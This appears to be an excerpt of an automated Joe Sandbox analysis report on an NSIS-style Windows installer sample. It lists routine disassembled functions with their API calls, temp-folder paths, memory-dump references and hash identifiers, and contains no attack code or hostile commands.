                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 2655323295-4002028044
                                                                                                                                                                                • Opcode ID: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                                                                                                                                • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                                                                                                                                • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                                                                                                                                                                Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 3248276644-3573784972
                                                                                                                                                                                • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                                                                                                                                • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                                                                                                                                                                • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                                                                                                                                • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                                                                                                                                                                Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsbF672.tmp, xrefs: 00405D6F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 3213498283-4002028044
                                                                                                                                                                                • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                                                                                • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                                                                                                                                                                • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                                                                                                                                                                Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                                                                                                                                                                • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                                                                                                                                                                Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll), ref: 0040268D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp$C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll
                                                                                                                                                                                • API String ID: 1659193697-365457192
                                                                                                                                                                                • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                                                                                                                                • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                                                                                                                                • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                                                                                                                                                                Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                                                                                                                                • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                                                                                                                                                                Function 004053CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004053F9
                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                                                                                                                                                  • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                                                                                                                                • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                                                                                                                                • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                                                                                                                                                                Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
